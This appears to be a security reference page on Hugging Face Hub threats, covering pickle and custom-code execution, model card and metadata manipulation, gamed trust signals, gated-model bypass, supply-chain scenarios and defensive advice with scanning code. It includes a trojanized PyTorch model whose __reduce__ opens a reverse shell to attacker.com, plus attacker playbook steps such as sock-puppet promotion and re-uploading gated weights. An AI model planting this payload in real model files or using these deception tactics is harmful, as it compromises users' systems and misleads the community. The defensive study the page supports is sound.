Hugging Face Hub Security
Attack surface analysis of Hugging Face Hub: malicious model uploads, pickle deserialization exploits, model card manipulation, trust signal limitations, gated model bypass, and community-driven trust exploitation.
Hugging Face Hub is the dominant distribution platform for ML models, serving as the de facto package registry for the ML community. With millions of models hosted and billions of monthly downloads, it occupies the same trust position for ML that npm holds for JavaScript or PyPI for Python -- except that ML artifacts can contain executable code by design. The Hub's community-driven model means that anyone can upload a model, and the trust signals that users rely on are largely cosmetic.
Malicious Model Uploads
Attack Vectors
The Hub supports multiple model formats, each with different risk profiles:
| Format | Risk Level | Attack Vector |
|---|---|---|
| Pickle (.pkl, .pt, .bin) | Critical | Arbitrary code execution on deserialization |
| Custom code (modeling_*.py) | Critical | Arbitrary Python execution when trust_remote_code=True |
| Tokenizer (tokenizer.py) | High | Code execution through custom tokenizer loading |
| ONNX | Medium | Potential for custom operator exploitation |
| Safetensors | Low | Weight-only format, no executable code |
| GGUF | Low | Metadata fields could be crafted, but no code execution |
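The low-risk rating for safetensors follows directly from the format: an 8-byte little-endian header length, a JSON header describing each tensor's dtype, shape, and byte offsets, then raw tensor bytes. Loading it is pure parsing with no deserialization hooks. A minimal stdlib-only sketch of the layout (the tensor name and values are illustrative):

```python
import json
import struct

def build_safetensors(tensors: dict) -> bytes:
    """Build a minimal safetensors blob: 8-byte header length + JSON header + raw data."""
    header, data, offset = {}, b"", 0
    for name, raw in tensors.items():
        header[name] = {"dtype": "F32", "shape": [len(raw) // 4],
                        "data_offsets": [offset, offset + len(raw)]}
        data += raw
        offset += len(raw)
    header_bytes = json.dumps(header).encode()
    return struct.pack("<Q", len(header_bytes)) + header_bytes + data

def read_safetensors_header(blob: bytes) -> dict:
    """Reading the header is plain JSON parsing -- no __reduce__, no code paths."""
    (header_len,) = struct.unpack("<Q", blob[:8])
    return json.loads(blob[8:8 + header_len])

blob = build_safetensors({"linear.weight": struct.pack("<4f", 1.0, 2.0, 3.0, 4.0)})
print(read_safetensors_header(blob))
```

Contrast this with pickle, where the file itself is a program for a stack machine: the format's safety comes from the fact that the header grammar simply has no way to express "call this function."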
Pickle-Based Attacks
PyTorch models saved with torch.save() use Python's pickle serialization, which executes arbitrary code during deserialization. An attacker can embed code that runs when a user calls torch.load() or when the transformers library loads the model.
Craft a trojanized model
Create a model that functions normally but executes a payload during loading. The payload runs before the model is usable, making it invisible to functional testing.
```python
import torch
import torch.nn as nn

class TrojanModel(nn.Module):
    def __init__(self):
        super().__init__()
        self.linear = nn.Linear(768, 768)

    def __reduce__(self):
        # Payload executes during deserialization, before any weights are usable
        return (
            exec,
            ("import subprocess; subprocess.Popen(['bash', '-c', "
             "'bash -i >& /dev/tcp/attacker.com/4444 0>&1'])",),
        )

# Saving the full module (not just the state_dict) pickles the TrojanModel
# object itself, so __reduce__ fires when a victim calls torch.load()
model = TrojanModel()
torch.save(model, "pytorch_model.bin")
```

Create a convincing repository
Upload the model with a professional model card, realistic training metrics, and a plausible name. Include legitimate-looking configuration files to pass casual inspection.
Promote through social engineering
Share the model on ML forums, reference it in discussions, and create derivative models that link back to the original. Build apparent legitimacy through community engagement.
Custom Code Execution
The trust_remote_code=True parameter is required to load models with custom architectures. When set, the transformers library downloads and executes arbitrary Python files from the model repository.
Files that can execute code:
- modeling_*.py -- Custom model architecture definitions
- configuration_*.py -- Custom configuration classes
- tokenization_*.py -- Custom tokenizer implementations
- image_processing_*.py -- Custom image processors
- Any file referenced in config.json via auto_map
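Because auto_map silently routes loading into repository-supplied Python files, one defensive habit is to list a downloaded repo's custom-code entry points before ever calling from_pretrained. A minimal sketch, assuming the usual config.json layout (the demo repo contents are illustrative; some repos use list-valued auto_map entries, which the sketch also handles):

```python
import json
import tempfile
from pathlib import Path

def remote_code_entrypoints(repo_dir: str) -> list[str]:
    """List the custom-code entry points a repo would execute under trust_remote_code=True."""
    config_path = Path(repo_dir) / "config.json"
    if not config_path.exists():
        return []
    config = json.loads(config_path.read_text())
    entries = set()
    for value in config.get("auto_map", {}).values():
        # auto_map values are usually "file_stem.ClassName" strings,
        # but some repos use lists; accept both forms
        for item in (value if isinstance(value, list) else [value]):
            if isinstance(item, str):
                entries.add(item)
    return sorted(entries)

# Demo against a hypothetical downloaded repo
repo = tempfile.mkdtemp()
(Path(repo) / "config.json").write_text(json.dumps(
    {"auto_map": {"AutoModel": "modeling_custom.CustomModel"}}))
print(remote_code_entrypoints(repo))  # ['modeling_custom.CustomModel']
```

An empty result does not prove safety (a tokenizer or processor can still carry custom code), but a non-empty one tells you exactly which files to read before trusting the repo.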
Model Card Manipulation
Model cards serve as the primary documentation and trust signal for Hub models. They are rendered Markdown files that appear on the model's page and influence user decisions.
Manipulation Techniques
Performance inflation. Report inflated benchmark scores in the model card. Users compare models by their self-reported metrics, so inflated numbers drive downloads.
Provenance fabrication. Claim the model is fine-tuned from a trusted base model (e.g., "Fine-tuned from Llama 3") to inherit trust by association. No verification mechanism confirms this claim.
Malicious links. Embed links to external resources (documentation, notebooks, demo sites) that serve malware or phishing pages. Model cards support full Markdown including links, images, and HTML in some contexts.
Misleading safety claims. Claim the model has been safety-tested, RLHF-aligned, or certified by an organization. These claims are not verified by the platform.
Metadata Gaming
Model card YAML frontmatter controls how models appear in Hub search and filtering:
```yaml
---
license: mit
datasets:
  - wikipedia          # May not actually be the training data
metrics:
  - accuracy: 0.95     # Self-reported, unverified
tags:
  - text-generation
  - safe               # Unverified claim
  - production-ready   # Unverified claim
---
```

Trust Signals and Their Limitations
Organization Badges
Hugging Face verifies organization identities, displaying a badge on their profile. However:
- Verification confirms identity, not artifact security
- Organization members can publish without per-model review
- Compromised organization accounts retain the badge
- Users equate "verified organization" with "safe model"
Community Engagement Metrics
| Metric | Intended Signal | Gaming Method |
|---|---|---|
| Downloads | Popularity | Automated download scripts |
| Likes | Community endorsement | Coordinated liking campaigns |
| Spaces | Active usage | Create derivative Spaces referencing the model |
| Discussions | Community engagement | Sock puppet accounts asking positive questions |
Malware Scanning
Hugging Face runs automated security scanning on uploaded files:
- Pickle scanning detects known malicious patterns in serialized files
- The scanner checks for suspicious __reduce__ implementations
- Custom code files are flagged for manual review
Scanner limitations:
- Novel payloads bypass pattern-matching detection
- Obfuscated code in custom Python files evades static analysis
- Multi-stage payloads where the initial loader fetches the real payload at runtime
- Scanner updates lag behind new attack techniques
Gated Model Bypass
Gated models require users to accept terms of use or request access before downloading. This mechanism is intended for license compliance and access control.
Bypass Techniques
Token sharing. A user with approved access shares their Hugging Face token, granting others access to gated models without going through the approval process.
API direct access. Gated model files are stored in the same infrastructure as public models. If the access control is implemented at the API layer rather than the storage layer, direct storage URLs may bypass gating.
Derivative models. Download a gated model through approved access, then re-upload the weights to a new, ungated repository. The original model's license may prohibit this, but technical controls do not prevent it.
Cached copies. Gated models downloaded by CI/CD systems are often cached in artifact stores, container images, or shared filesystems without gating controls. The gate applies at download time, not at usage time.
Supply Chain Attack Scenarios
Scenario 1: Typosquatting
An attacker registers meta-Ilama/Llama-3-8B (capital I instead of lowercase L). Users who mistype the repository name download and load the attacker's model, which contains a pickle payload. The model card is a copy of the legitimate model's card with identical metrics.
Scenario 2: Dependency Chain Poisoning
An attacker creates a seemingly useful adapter (LoRA weights) that references a base model. When users load the adapter, it pulls the base model from the attacker's repository rather than the intended source. The adapter works correctly, but the base model contains a backdoor.
Scenario 3: Abandoned Repository Takeover
Popular models are sometimes created by individual researchers who later abandon their accounts. An attacker could attempt to gain control of abandoned accounts (password reuse, email provider compromise) and update the model files with poisoned versions. Existing download links and references still point to the same repository.
Defensive Recommendations
For Model Consumers
- Verify repository names character by character before downloading
- Use safetensors format exclusively when available; reject pickle-based models
- Never set trust_remote_code=True for models from untrusted sources
- Pin to specific commits rather than branch references
- Verify hashes of downloaded files against known-good values
- Scan model files with tools like fickling before loading
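A lightweight complement to a fickling scan: Python's stdlib pickletools can disassemble a pickle stream without executing it, so a pre-load check can flag the opcodes (GLOBAL/STACK_GLOBAL, REDUCE, and friends) that any code-executing payload needs. A hedged sketch; the opcode list is illustrative, not exhaustive:

```python
import io
import pickle
import pickletools

# Opcodes a code-executing payload relies on (illustrative set)
SUSPICIOUS_OPCODES = {"GLOBAL", "STACK_GLOBAL", "REDUCE", "INST", "OBJ", "NEWOBJ"}

def scan_pickle(data: bytes) -> set[str]:
    """Disassemble a pickle stream without executing it; return suspicious opcodes found."""
    found = set()
    for opcode, _arg, _pos in pickletools.genops(io.BytesIO(data)):
        if opcode.name in SUSPICIOUS_OPCODES:
            found.add(opcode.name)
    return found

# A plain dict of values is clean...
print(scan_pickle(pickle.dumps({"weights": [1.0, 2.0]})))  # set()

# ...while any __reduce__ payload needs a global lookup plus REDUCE
class Evil:
    def __reduce__(self):
        return (print, ("payload would run here",))

print(scan_pickle(pickle.dumps(Evil())))
```

Note that legitimate torch.save() checkpoints also emit GLOBAL and REDUCE to rebuild tensors, so this scan flags candidates for inspection rather than proving malice; fickling adds the semantic layer that distinguishes tensor reconstruction from subprocess calls.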
For Organizations Publishing Models
- Use safetensors for all model weight storage
- Sign model artifacts with Sigstore or similar
- Enable branch protection on the Hub repository
- Monitor for typosquat repositories of your models
- Implement access logging for gated models
For Platform Security
- Expand malware scanning to cover custom code files and configuration-based attacks
- Implement mandatory signing for organization-published models
- Enforce namespace reservation for well-known model families
- Provide provenance attestation for the training process, not just the upload
References
- Hugging Face Security -- Platform security documentation
- Safetensors -- Safe model serialization format
- Fickling -- Pickle security analysis tool
- JFrog ML Model Security Research -- Analysis of malicious Hub models